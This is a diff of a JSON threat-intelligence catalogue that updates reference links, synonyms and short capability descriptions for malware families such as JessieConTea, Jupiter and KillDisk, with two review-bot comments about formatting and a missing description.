+ "description": "Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to \u201charvest\u201d the highest possible emails and accounts information. Distributed in a ZIP container the interface is quite intuitive: the Microsoft exchange address and its version shall be provided. Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected and threads number should be provided in order to optimize the attack balance.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jason",
- "https://twitter.com/P3pperP0tts/status/1135503765287657472",
- "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://marcoramilli.com/2019/06/06/apt34-jason-project/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
+ "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
+ "https://twitter.com/P3pperP0tts/status/1135503765287657472"
 ],
 "synonyms": [],
 "type": []
@@ -29510,15 +30935,30 @@
 "uuid": "a1d7e117-4ca9-4d67-a4dd-53626827ed2f",
 "value": "Jeno"
 },
+ {
+ "description": "JessieConTea is a remote access trojan that uses HTTP(S) for communication. It supports around 30 commands that include operations on the victim\u2019s filesystem, basic process management, file exfiltration (both plain and zipped), and the download and execution of additional tools from the attacker\u2019s arsenal. The commands are indexed by 32-bit integers, starting with the value 0x60D49D97.\r\n\r\nThe malware was delivered in-the-wild via trojanized applications like DeFi Wallet or Citrix Workspace.\r\n\r\nJessieConTea generates POST parameters with a specific parameter name, jsessid, from which the initial part of its name is derived. Also, it contains a specific RTTI symbol \".?AVCHttpConn@@\", which inspired the second part of the name. It uses RC4 for C&C traffic encryption.\r\n",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jessiecontea",
+ "https://cn.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf",
+ "https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html",
+ "https://securelist.com/lazarus-trojanized-defi-app/106195/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8f286f97-30c8-4281-887b-9cbede9f1e1e",
+ "value": "JessieConTea"
+ },
 {
 "description": "Cisco Talos identified JhoneRAT in January 2020. The RAT is delivered through cloud services (Google Drive) and also submits stolen data to them (Google Drive, Twitter, ImgBB, GoogleForms). 
The actors using JhoneRAT target Saudi Arabia, Iraq, Egypt, Libya, Algeria, Morocco, Tunisia, Oman, Yemen, Syria, UAE, Kuwait, Bahrain and Lebanon.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jhone_rat",
- "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
- "https://blog.talosintelligence.com/2020/01/jhonerat.html",
 "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/"
+ "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
+ "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/",
+ "https://blog.talosintelligence.com/2020/01/jhonerat.html"
 ],
 "synonyms": [],
 "type": []
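Review bot: The JessieConTea description keeps Windows line endings — `\r\n\r\n` between paragraphs and a trailing `\r\n` right before the closing quote — whereas the neighbouring JhoneRAT description in the same hunk is a single run of text; consumers that render `description` verbatim will show the stray `\r` characters and a blank trailing line. Normalising the separators to `\n` (or collapsing to one paragraph) and dropping the trailing newline would keep the field consistent with the rest of the cluster. If the text is imported unchanged from upstream, the normalisation belongs in the import step rather than in a hand edit here.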
@@ -29569,15 +31009,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware",
 "https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4",
+ "https://www.secureworks.com/research/threat-profiles/nickel-academy",
 "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://www.secureworks.com/research/threat-profiles/nickel-academy",
- "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware",
 "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/",
- "https://www.us-cert.gov/ncas/alerts/TA18-149A",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments"
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.us-cert.gov/ncas/alerts/TA18-149A"
 ],
 "synonyms": [],
 "type": []
@@ -29656,14 +31096,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jsoutprox",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
 "https://twitter.com/zlab_team/status/1208022180241530882",
- "https://blogs.quickheal.com/multi-staged-jsoutprox-rat-targets-indian-cooperative-banks-and-finance-companies/",
- "https://www.fortinet.com/blog/threat-research/adversary-playbook-javascript-rat-looking-for-that-government-cheese",
- "https://blog.yoroi.company/research/unveiling-jsoutprox-a-new-enterprise-grade-implant/",
- "https://yoroi.company/research/financial-institutions-in-the-sight-of-new-jsoutprox-attack-waves/",
 "https://www.zscaler.com/blogs/research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat",
- "https://www.seqrite.com/documents/en/white-papers/whitepaper-multi-staged-jsoutprox-rat-target-indian-co-operative-banks-and-finance-companies.pdf"
+ "https://www.seqrite.com/documents/en/white-papers/whitepaper-multi-staged-jsoutprox-rat-target-indian-co-operative-banks-and-finance-companies.pdf",
+ "https://www.fortinet.com/blog/threat-research/adversary-playbook-javascript-rat-looking-for-that-government-cheese",
+ "https://blogs.quickheal.com/multi-staged-jsoutprox-rat-targets-indian-cooperative-banks-and-finance-companies/",
+ "https://yoroi.company/research/financial-institutions-in-the-sight-of-new-jsoutprox-attack-waves/",
+ "https://blog.yoroi.company/research/unveiling-jsoutprox-a-new-enterprise-grade-implant/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -29676,19 +31116,20 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jssloader",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
- "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/FIN7%20JSSLOADER%20FINAL%20WEB.pdf",
- "https://malwarebytes.app.box.com/s/ym6r7o5hq0rx2nxjbctfv2sw5vx386ni",
- "https://blog.morphisec.com/vmware-identity-manager-attack-backdoor",
- "https://www.mandiant.com/resources/evolution-of-fin7",
- "https://www.secureworks.com/blog/excel-add-ins-deliver-jssloader-malware",
- "https://www.bleepingcomputer.com/news/security/malicious-microsoft-excel-add-ins-used-to-deliver-rat-malware/",
- "https://www.malwarebytes.com/blog/threat-intelligence/2022/08/jssloader-the-shellcode-edition",
 "https://blog.morphisec.com/new-jssloader-trojan-delivered-through-xll-files",
 "https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html",
+ "https://malwarebytes.app.box.com/s/ym6r7o5hq0rx2nxjbctfv2sw5vx386ni",
+ "https://www.secureworks.com/blog/excel-add-ins-deliver-jssloader-malware",
+ "https://www.microsoft.com/en-us/security/blog/2023/09/12/malware-distributor-storm-0324-facilitates-ransomware-access/",
 "https://www.proofpoint.com/us/blog/threat-insight/jssloader-recoded-and-reloaded",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/",
+ "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/FIN7%20JSSLOADER%20FINAL%20WEB.pdf",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/08/jssloader-the-shellcode-edition",
+ "https://www.bleepingcomputer.com/news/security/malicious-microsoft-excel-add-ins-used-to-deliver-rat-malware/",
 "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- 
"https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/"
+ "https://www.mandiant.com/resources/evolution-of-fin7",
+ "https://blog.morphisec.com/vmware-identity-manager-attack-backdoor"
 ],
 "synonyms": [],
 "type": []
@@ -29701,11 +31142,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.juicy_potato",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
+ "https://lifars.com/wp-content/uploads/2020/06/Cryptocurrency-Miners-XMRig-Based-CoinMiner-by-Blue-Mockingbird-Group.pdf",
 "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/",
 "https://github.com/ohpe/juicy-potato",
- "https://www.welivesecurity.com/2021/08/09/iispy-complex-server-side-backdoor-antiforensic-features/",
- "https://lifars.com/wp-content/uploads/2020/06/Cryptocurrency-Miners-XMRig-Based-CoinMiner-by-Blue-Mockingbird-Group.pdf",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf"
+ "https://www.welivesecurity.com/2021/08/09/iispy-complex-server-side-backdoor-antiforensic-features/"
 ],
 "synonyms": [],
 "type": []
@@ -29726,6 +31167,22 @@
 "uuid": "a08db33d-4c37-4075-bd49-c3ab66a339db",
 "value": "JUMPALL"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jupiter",
+ "https://securelist.com/lazarus-andariel-mistakes-and-easyrat/110119/",
+ "https://medium.com/@DCSO_CyTec/andariels-jupiter-malware-and-the-case-of-the-curious-c2-dbfe29f57499"
+ ],
+ "synonyms": [
+ "EarlyRAT"
+ ],
+ "type": []
+ },
+ "uuid": "47baaed8-073c-4a13-92dc-434210ea3cd0",
+ "value": "Jupiter"
+ },
 {
 "description": "",
 "meta": {
@@ -29759,10 +31216,10 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany",
 "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf",
 "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks",
- "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group",
 "https://www.secureworks.com/research/threat-profiles/iron-liberty",
- "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector",
- "https://vblocalhost.com/uploads/VB2021-Slowik.pdf"
+ "https://vblocalhost.com/uploads/VB2021-Slowik.pdf",
+ "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group",
+ "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector"
 ],
 "synonyms": [
 "Karagny"
@@ -29777,8 +31234,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader",
- "https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab",
- "https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/"
+ "https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/",
+ "https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab"
 ],
 "synonyms": [],
 "type": []
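Review bot: The new Jupiter entry lands with `"description": ""` even though it introduces the alias `EarlyRAT` and cites two write-ups (DCSO on Andariel's Jupiter malware, Kaspersky on EarlyRAT) that are the only place a reader can learn why the two names are linked; a one-line description would make the alias self-explanatory. Something along the lines of `"description": "According to DCSO and Kaspersky, Jupiter is a malware family attributed to Andariel; Kaspersky tracks it as EarlyRAT."`, with the wording checked against the two posts before committing it. Separately, the securelist slug spells the family `easyrat` while the synonym reads `EarlyRAT` — worth confirming the alias spelling against the article itself so the typo does not propagate into other galaxies that key on synonyms.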
@@ -29791,9 +31248,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius",
- "https://research.checkpoint.com/banking-trojans-development/",
 "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
- "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/"
+ "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/",
+ "https://research.checkpoint.com/banking-trojans-development/"
 ],
 "synonyms": [],
 "type": []
@@ -29807,10 +31264,10 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.karkoff",
 "https://www.secureworks.com/research/threat-profiles/cobalt-edgewater",
- "https://blog.telsy.com/apt34-aka-oilrig-attacks-lebanon-government-entities-with-maildropper-implant/",
 "https://blog.yoroi.company/research/karkoff-2020-a-new-apt34-espionage-operation-involves-lebanon-government/",
 "https://mp.weixin.qq.com/s/o_EVjBVN2sQ1q7cl4rUXoQ",
 "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html",
+ "https://blog.telsy.com/apt34-aka-oilrig-attacks-lebanon-government-entities-with-maildropper-implant/",
 "https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html",
 "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
 ],
@@ -29829,14 +31286,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.karma",
- "https://www.sentinelone.com/labs/karma-ransomware-an-emerging-threat-with-a-hint-of-nemty-pedigree/",
- "https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728",
- "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://blogs.blackberry.com/en/2021/11/threat-thursday-karma-ransomware",
- "https://www.youtube.com/watch?v=hgz5gZB3DxE",
+ "https://blog.cyble.com/2021/08/24/a-deep-dive-analysis-of-karma-ransomware/",
 "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://blog.cyble.com/2021/08/24/a-deep-dive-analysis-of-karma-ransomware/"
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/",
+ "https://www.youtube.com/watch?v=hgz5gZB3DxE",
+ "https://blogs.blackberry.com/en/2021/11/threat-thursday-karma-ransomware",
+ "https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728",
+ "https://www.sentinelone.com/labs/karma-ransomware-an-emerging-threat-with-a-hint-of-nemty-pedigree/"
 ],
 "synonyms": [],
 "type": []
@@ -29849,8 +31306,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent",
- "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/",
- "https://www.threatconnect.com/blog/kasperagent-malware-campaign/"
+ "https://www.threatconnect.com/blog/kasperagent-malware-campaign/",
+ "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/"
 ],
 "synonyms": [],
 "type": []
@@ -29864,14 +31321,16 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar",
 "https://youtu.be/SW8kVkwDOrc?t=24706",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/",
- "https://www.epicturla.com/blog/sysinturla",
- "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
 "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
+ "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
 "https://securelist.com/apt-trends-report-q1-2021/101967/",
 "https://securelist.com/sunburst-backdoor-kazuar/99981/",
- "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/"
+ "https://cert.gov.ua/article/5213167",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
+ "https://twitter.com/msftsecintel/status/1681695399084539908",
+ "https://www.epicturla.com/blog/sysinturla"
 ],
 "synonyms": [],
 "type": []
@@ -29939,15 +31398,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos",
- "https://en.wikipedia.org/wiki/Kelihos_botnet",
- "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/",
- "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/",
- "https://www.crowdstrike.com/blog/farewell-to-kelihos-and-zombie-spider/",
- "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
 "https://www.justice.gov/opa/pr/russian-national-convicted-charges-relating-kelihos-botnet",
+ "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/",
 "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
- "https://www.bleepingcomputer.com/news/security/us-convicts-russian-national-behind-kelihos-botnet-crypting-service/",
- "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/"
+ "https://www.crowdstrike.com/blog/farewell-to-kelihos-and-zombie-spider/",
+ "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/",
+ "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/",
+ "https://en.wikipedia.org/wiki/Kelihos_botnet",
+ "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
+ "https://www.bleepingcomputer.com/news/security/us-convicts-russian-national-behind-kelihos-botnet-crypting-service/"
 ],
 "synonyms": [],
 "type": []
@@ -29973,18 +31432,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf",
 "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/",
- "https://www.amnesty.de/sites/default/files/2021-02/Amnesty-Bericht-Vietnam-Click-And-Bait-Blogger-Deutschland-Spionage-Menschenrechtsverteidiger-Februar-2021.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7",
+ "https://blog.cystack.net/word-based-malware-attack/",
 "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.amnesty.de/sites/default/files/2021-02/Amnesty-Bericht-Vietnam-Click-And-Bait-Blogger-Deutschland-Spionage-Menschenrechtsverteidiger-Februar-2021.pdf",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/",
- "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/",
 "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
- "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam",
- "https://blog.cystack.net/word-based-malware-attack/",
- "https://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7"
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf",
+ "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/",
+ "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam"
 ],
 "synonyms": [],
 "type": []
@@ -29997,10 +31456,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrican",
+ "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/",
 "https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/",
- "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
 "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf",
- "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/"
+ "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/"
 ],
 "synonyms": [],
 "type": []
@@ -30027,11 +31486,11 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.keybase",
 "https://community.rsa.com/community/products/netwitness/blog/2018/02/15/malspam-delivers-keybase-keylogger-2-11-2017",
- "https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html",
- "https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/",
- "https://www.virusbulletin.com/virusbulletin/2016/07/new-keylogger-block/",
- "https://voidsec.com/keybase-en/",
 "https://unit42.paloaltonetworks.com/keybase-threat-grows-despite-public-takedown-a-picture-is-worth-a-thousand-words/",
+ "https://www.virusbulletin.com/virusbulletin/2016/07/new-keylogger-block/",
+ "https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/",
+ "https://voidsec.com/keybase-en/",
+ "https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html",
 "https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/"
 ],
 "synonyms": [
@@ -30047,9 +31506,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy",
- "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/",
 "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html",
 "https://www.secureworks.com/research/threat-profiles/bronze-hobart",
+ "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/",
 "https://citizenlab.ca/2016/11/parliament-keyboy/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
 ],
@@ -30067,8 +31526,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3",
 "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong",
- "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/",
- "https://twitter.com/smoothimpact/status/773631684038107136"
+ "https://cocomelonc.github.io/malware/2023/05/11/malware-tricks-28.html",
+ "https://twitter.com/smoothimpact/status/773631684038107136",
+ "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/"
 ],
 "synonyms": [],
 "type": []
@@ -30083,8 +31543,8 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble",
 "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A",
 "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://research.checkpoint.com/north-korea-turns-against-russian-targets/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://research.checkpoint.com/north-korea-turns-against-russian-targets/"
 ],
 "synonyms": [],
 "type": []
@@ -30097,8 +31557,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kgh_spy",
- "https://mp.weixin.qq.com/s/cbaePmZSk_Ob0r486RMXyw",
- "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite"
+ "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite",
+ "https://mp.weixin.qq.com/s/cbaePmZSk_Ob0r486RMXyw"
 ],
 "synonyms": [],
 "type": []
@@ -30111,11 +31571,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.khonsari",
- "https://cloudsek.com/technical-analysis-of-khonsari-ransomware-campaign-exploiting-the-log4shell-vulnerability/",
+ "https://assets.virustotal.com/reports/2021trends.pdf",
 "https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation",
+ "https://cloudsek.com/technical-analysis-of-khonsari-ransomware-campaign-exploiting-the-log4shell-vulnerability/",
 "https://www.cadosecurity.com/analysis-of-novel-khonsari-ransomware-deployed-by-the-log4shell-vulnerability/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
- "https://assets.virustotal.com/reports/2021trends.pdf"
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks"
 ],
 "synonyms": [],
 "type": []
@@ -30124,14 +31584,14 @@
 "value": "Khonsari"
 },
 {
- "description": "According to Unit42, KHRAT is a Trojan that registers victims using their infected machine’s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.",
+ "description": "According to Unit42, KHRAT is a Trojan that registers victims using their infected machine\u2019s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat",
 "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/",
- "https://unit42.paloaltonetworks.com/atoms/rancortaurus/",
+ "https://www.forcepoint.com/de/blog/x-labs/trojanized-adobe-installer-used-install-dragonok-s-new-custom-backdoor",
 "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/",
- "https://www.forcepoint.com/de/blog/x-labs/trojanized-adobe-installer-used-install-dragonok-s-new-custom-backdoor"
+ "https://unit42.paloaltonetworks.com/atoms/rancortaurus/"
 ],
 "synonyms": [],
 "type": []
@@ -30157,28 +31617,32 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.killav",
+ "https://www.mandiant.com/resources/unc2596-cuba-ransomware",
+ "https://news.sophos.com/en-us/2022/12/13/signed-driver-malware-moves-up-the-software-trust-chain/",
 "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/",
 "https://cyber.aon.com/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/"
 ],
- "synonyms": [],
+ "synonyms": [
+ "BURNTCIGAR"
+ ],
 "type": []
 },
 "uuid": "ad6ac685-e13f-4522-9805-644f82818347",
 "value": "KillAV"
 },
 {
- "description": "KillDisk is a generic detection name used by ESET to refer to destructive malware with disk wiping capabilities, such as damaging boot sectors and overwriting then deleting (system) files, followed by a reboot to render the machine unusable. Although all KillDisk malware has similar functionality, as a generic detection, individual samples do not necessarily have strong code similarities or relationships. Such generic malware detections usually have many “sub-families”, distinguished by the detection suffix (e.g. KillDisk.NBO, KillDisk.NCV, and KillDisk.NCX). Sub-family variants that do have strong code similarities, are sometimes seen in separate cyberattacks and thus can help researchers make connections between them. ",
+ "description": "KillDisk is a generic detection name used by ESET to refer to destructive malware with disk wiping capabilities, such as damaging boot sectors and overwriting then deleting (system) files, followed by a reboot to render the machine unusable. Although all KillDisk malware has similar functionality, as a generic detection, individual samples do not necessarily have strong code similarities or relationships. Such generic malware detections usually have many \u201csub-families\u201d, distinguished by the detection suffix (e.g. KillDisk.NBO, KillDisk.NCV, and KillDisk.NCX). 
Sub-family variants that do have strong code similarities, are sometimes seen in separate cyberattacks and thus can help researchers make connections between them. ",
 "meta": {
 "refs": [
